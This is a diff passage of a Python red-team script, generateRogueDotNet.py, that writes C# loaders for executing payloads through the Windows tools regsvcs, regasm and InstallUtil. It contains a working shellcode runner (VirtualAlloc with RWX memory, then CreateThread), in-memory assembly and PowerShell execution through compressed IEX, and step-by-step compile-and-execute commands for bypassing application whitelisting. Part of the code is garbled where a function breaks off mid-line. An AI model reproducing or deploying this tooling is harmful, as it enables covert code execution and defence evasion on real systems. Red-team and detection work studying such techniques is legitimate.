IntPtr lpAddress, - UInt32 dwSize, - UInt32 dwFreeType - ); - - [DllImport("kernel32")] - private static extern IntPtr CreateThread( - UInt32 lpThreadAttributes, - UInt32 dwStackSize, - IntPtr lpStartAddress, - IntPtr param, - UInt32 dwCreationFlags, - ref UInt32 lpThreadId - ); - - [DllImport("kernel32")] - private static extern bool CloseHandle( - IntPtr hHandle - ); - - [DllImport("kernel32")] - private static extern UInt32 WaitForSingleObject( - IntPtr hHandle, - UInt32 dwMilliseconds - ); - - private static UInt32 MEM_COMMIT = 0x1000; - private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; - private static UInt32 MEM_RELEASE = 0x8000; - - public static void Execute() { - - byte[] payload = new byte[$payloadSize] { - $payload2 - }; - - IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); - Marshal.Copy(payload, 0, funcAddr, payload.Length); - IntPtr hThread = IntPtr.Zero; - UInt32 threadId = 0; - - hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId); - WaitForSingleObject(hThread, 0xFFFFFFFF); - - CloseHandle(hThread); - VirtualFree(funcAddr, 0, MEM_RELEASE); - - }''').safe_substitute( - payload2 = encodedPayload, - payloadSize = len(payload) - ) - - launchCode = shellcodeLoader - - else: - usings += ''' -using System.Management.Automation; -using System.Management.Automation.Runspaces; -''' - powershellLaunchCode = string.Template(''' - public static void Execute() { - - byte[] payload = System.Convert.FromBase64String("$payload2"); - string decoded = System.Text.Encoding.UTF8.GetString(payload); - - Runspace runspace = RunspaceFactory.CreateRunspace(); - runspace.Open(); - - Pipeline pipeline = runspace.CreatePipeline(); - pipeline.Commands.AddScript(decoded); - pipeline.Invoke(); - - runspace.Close(); - }''').safe_substitute( - payload2 = base64.b64encode(payload.encode()).decode() - ) - - launchCode = powershellLaunchCode - - - template = string.Template(''' -using System; -using 
System.Diagnostics; -using System.Reflection; -using System.Runtime.InteropServices; -using System.EnterpriseServices; -$usings - -/* - Author: Casey Smith, Twitter: @subTee - Customized by: Mariusz B. / mgeeky, - License: BSD 3-Clause - - Step 1: Create Your Strong Name Key -> key.snk - - $key = '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' - $Content = [System.Convert]::FromBase64String($key) - Set-Content key.snk -Value $Content -Encoding Byte - - Step 2: Compile source code: - %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs - - Step 3: Execute your payload! - %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll - %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll - - %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll - %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll - - %WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll -# %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll -*/ - -namespace Program -{ - public class Bypass : ServicedComponent - { - public Bypass() - { - } - - // This executes if registration is successful - [ComRegisterFunction] - public static void RegisterClass( string key ) - { - Shellcode.Execute(); - } - - // This executes if registration fails - [ComUnregisterFunction] - public static void UnRegisterClass( string key ) - { - Shellcode.Execute(); - } - } - - [System.ComponentModel.RunInstaller(true)] - public class ForInstallUtil : System.Configuration.Install.Installer - { - // This executes during InstallUtil /U invocation - public override void Uninstall(System.Collections.IDictionary savedState) - { - Shellcode.Execute(); - } - } - - public class Shellcode - { - $launchCode - } -}''').safe_substitute( - launchCode = launchCode, - usings = 
usings - ) - - return template - -def detectFileIsExe(filePath, forced = False): - first1000 = [] - - with open(filePath, 'rb') as f: - first1000 = f.read()[:1000] - - if not (first1000[0] == 'M' and first1000[1] == 'Z'): - return False - - elfanew = struct.unpack(' - -''') - if len(argv) < 2: - print('Usage: ./generateRogueDotNet.py ') - sys.exit(-1) - - args = opts(argv) - - _format = 'powershell' - - if args.exe: - if not detectFileIsExe(args.inputFile, args.exe): - sys.stderr.write('[-] File not recognized as PE/EXE.\n\n') - return False - - _format = 'exe' - sys.stderr.write('[+] File recognized as PE/EXE.\n\n') - with open(args.inputFile, 'rb') as f: - payload = f.read() - - elif args.raw: - _format = 'raw' - sys.stderr.write('[+] File specified as raw Shellcode.\n\n') - with open(args.inputFile, 'rb') as f: - payload = f.read() - - else: - sys.stderr.write('[+] Powershell code given.\n') - - if args.inputFile.endswith('.exe'): - return False - - payload = getCompressedPayload(args.inputFile) - - output = getSourceFileContents(payload, _format) - - print(output) - - management = '' - if _format == 'powershell': - management = ' /r:System.Management.Automation.dll' - - commands = ''' - -===================================== -NEXT STEPS: - -Step 1: Create Your Strong Name Key -> key.snk (or use the one provided in this directory) - - $key = 
'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' - $Content = [System.Convert]::FromBase64String($key) - Set-Content key.snk -Value $Content -Encoding Byte - -Step 2: Compile source code: - %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll{} /target:library /out:rogue.dll /keyfile:key.snk program.cs - -Step 3: Execute your payload! - %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll - %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll - - %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll - %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll - - %WINDIR%\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll - %WINDIR%\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll - '''.format(management) - - if 'PROGRAMFILES(X86)' in os.environ: - commands = commands.replace('Framework', 'Framework64') - - sys.stderr.write(commands) - -if __name__ == '__main__': - main(sys.argv) +#!/usr/bin/python3 +# +# Red-Teaming script that constructs C# code for Regsvcs/Regasm/InstallUtil code execution technique. 
+# +# Step 1: Generate source code file +# cmd> python3 generateRogueDotNet.py -r payload.bin > program.cs +# +# Step 2: Compilate library .NET Assembly +# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs +# +# if you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used +# to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). +# Then proper compilation command will be: +# +# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs +# +# Step 3: Code execution via Regsvcs, Regasm or InstallUtil: +# x86: +# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll +# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll + +# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll +# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll + +# cmd> %WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +# x64: +# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll +# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll + +# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll +# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll + +# cmd> %WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +# +# Mariusz B. 
/ mgeeky, +# + +import re +import os +import io +import sys +import gzip +import base64 +import string +import struct +import random +import binascii +import argparse + + +def getCompressedPayload(filePath): + out = io.BytesIO() + encoded = '' + with open(filePath, 'rb') as f: + inp = f.read() + + with gzip.GzipFile(fileobj = out, mode = 'w') as fo: + fo.write(inp) + + encoded = base64.b64encode(out.getvalue()) + + powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format( + encoded.decode() + ) + return powershell + +def getSourceFileContents(payload, _format): + launchCode = '' + usings = '' + + if _format == 'exe': + + exeLaunchCode = string.Template(''' + public static void Execute() { + + string payload = "$payload2"; + byte[] decoded = System.Convert.FromBase64String(payload); + + Assembly asm = Assembly.Load(decoded); + MethodInfo method = asm.EntryPoint; + object instance = asm.CreateInstance(method.Name); + method.Invoke(instance, null); + + }''').safe_substitute( + payload2 = base64.b64encode(payload.encode()).decode() + ) + + + launchCode = exeLaunchCode + + elif _format == 'raw': + + foo = str(binascii.hexlify(payload), 'ascii') + fooarr = ['0x{}'.format(foo[i:i+2]) for i in range(0, len(foo), 2)] + encodedPayload = ' ' + + for i in range(len(fooarr)): + if i % 16 == 0 and i > 0: + encodedPayload += '\n ' + encodedPayload += '{}, '.format(fooarr[i]) + + encodedPayload = encodedPayload.strip()[:-1] + + shellcodeLoader = string.Template(''' + [DllImport("kernel32")] + private static extern IntPtr VirtualAlloc( + IntPtr lpAddress, UIntPtr dwSize, + UInt32 flAllocationType, + UInt32 flProtect + ); + + [DllImport("kernel32")] + private static extern bool VirtualFree( + IntPtr lpAddress, + UInt32 dwSize, + UInt32 dwFreeType + ); + + [DllImport("kernel32")] + private static extern IntPtr 
CreateThread( + UInt32 lpThreadAttributes, + UInt32 dwStackSize, + IntPtr lpStartAddress, + IntPtr param, + UInt32 dwCreationFlags, + ref UInt32 lpThreadId + ); + + [DllImport("kernel32")] + private static extern bool CloseHandle( + IntPtr hHandle + ); + + [DllImport("kernel32")] + private static extern UInt32 WaitForSingleObject( + IntPtr hHandle, + UInt32 dwMilliseconds + ); + + private static UInt32 MEM_COMMIT = 0x1000; + private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; + private static UInt32 MEM_RELEASE = 0x8000; + + public static void Execute() { + + byte[] payload = new byte[$payloadSize] { + $payload2 + }; + + IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + Marshal.Copy(payload, 0, funcAddr, payload.Length); + IntPtr hThread = IntPtr.Zero; + UInt32 threadId = 0; + + hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId); + WaitForSingleObject(hThread, 0xFFFFFFFF); + + CloseHandle(hThread); + VirtualFree(funcAddr, 0, MEM_RELEASE); + + }''').safe_substitute( + payload2 = encodedPayload, + payloadSize = len(payload) + ) + + launchCode = shellcodeLoader + + else: + usings += ''' +using System.Management.Automation; +using System.Management.Automation.Runspaces; +''' + powershellLaunchCode = string.Template(''' + public static void Execute() { + + byte[] payload = System.Convert.FromBase64String("$payload2"); + string decoded = System.Text.Encoding.UTF8.GetString(payload); + + Runspace runspace = RunspaceFactory.CreateRunspace(); + runspace.Open(); + + Pipeline pipeline = runspace.CreatePipeline(); + pipeline.Commands.AddScript(decoded); + pipeline.Invoke(); + + runspace.Close(); + }''').safe_substitute( + payload2 = base64.b64encode(payload.encode()).decode() + ) + + launchCode = powershellLaunchCode + + + template = string.Template(''' +using System; +using System.Diagnostics; +using System.Reflection; +using System.Runtime.InteropServices; +using System.EnterpriseServices; +$usings 
+ +/* + Author: Casey Smith, Twitter: @subTee + Customized by: Mariusz B. / mgeeky, + License: BSD 3-Clause + + Step 1: Create Your Strong Name Key -> key.snk + + $key = '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' + $Content = [System.Convert]::FromBase64String($key) + Set-Content key.snk -Value $Content -Encoding Byte + + Step 2: Compile source code: + %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs + + Step 3: Execute your payload! + %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll + %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll + + %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll + %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll + + %WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +# %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +*/ + +namespace Program +{ + public class Bypass : ServicedComponent + { + public Bypass() + { + } + + // This executes if registration is successful + [ComRegisterFunction] + public static void RegisterClass( string key ) + { + Shellcode.Execute(); + } + + // This executes if registration fails + [ComUnregisterFunction] + public static void UnRegisterClass( string key ) + { + Shellcode.Execute(); + } + } + + [System.ComponentModel.RunInstaller(true)] + public class ForInstallUtil : System.Configuration.Install.Installer + { + // This executes during InstallUtil /U invocation + public override void Uninstall(System.Collections.IDictionary savedState) + { + Shellcode.Execute(); + } + } + + public class Shellcode + { + $launchCode + } +}''').safe_substitute( + launchCode = launchCode, + usings = usings + ) + + return template + +def detectFileIsExe(filePath, forced = False): + first1000 = [] + + with open(filePath, 'rb') 
as f: + first1000 = f.read()[:1000] + + if not (first1000[0] == 'M' and first1000[1] == 'Z'): + return False + + elfanew = struct.unpack(' + +''') + if len(argv) < 2: + print('Usage: ./generateRogueDotNet.py ') + sys.exit(-1) + + args = opts(argv) + + _format = 'powershell' + + if args.exe: + if not detectFileIsExe(args.inputFile, args.exe): + sys.stderr.write('[-] File not recognized as PE/EXE.\n\n') + return False + + _format = 'exe' + sys.stderr.write('[+] File recognized as PE/EXE.\n\n') + with open(args.inputFile, 'rb') as f: + payload = f.read() + + elif args.raw: + _format = 'raw' + sys.stderr.write('[+] File specified as raw Shellcode.\n\n') + with open(args.inputFile, 'rb') as f: + payload = f.read() + + else: + sys.stderr.write('[+] Powershell code given.\n') + + if args.inputFile.endswith('.exe'): + return False + + payload = getCompressedPayload(args.inputFile) + + output = getSourceFileContents(payload, _format) + + print(output) + + management = '' + if _format == 'powershell': + management = ' /r:System.Management.Automation.dll' + + commands = ''' + +===================================== +NEXT STEPS: + +Step 1: Create Your Strong Name Key -> key.snk (or use the one provided in this directory) + + $key = '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' + $Content = [System.Convert]::FromBase64String($key) + Set-Content key.snk -Value $Content -Encoding Byte + +Step 2: Compile source code: + %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll{} /target:library /out:rogue.dll /keyfile:key.snk program.cs + +Step 3: Execute your payload! 
+ %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll
+ %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll
+
+ %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll
+ %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll
+
+ %WINDIR%\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
+ %WINDIR%\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
+ '''.format(management)
+
+ if 'PROGRAMFILES(X86)' in os.environ:
+ commands = commands.replace('Framework', 'Framework64')
+
+ sys.stderr.write(commands)
+
+if __name__ == '__main__':
+ main(sys.argv)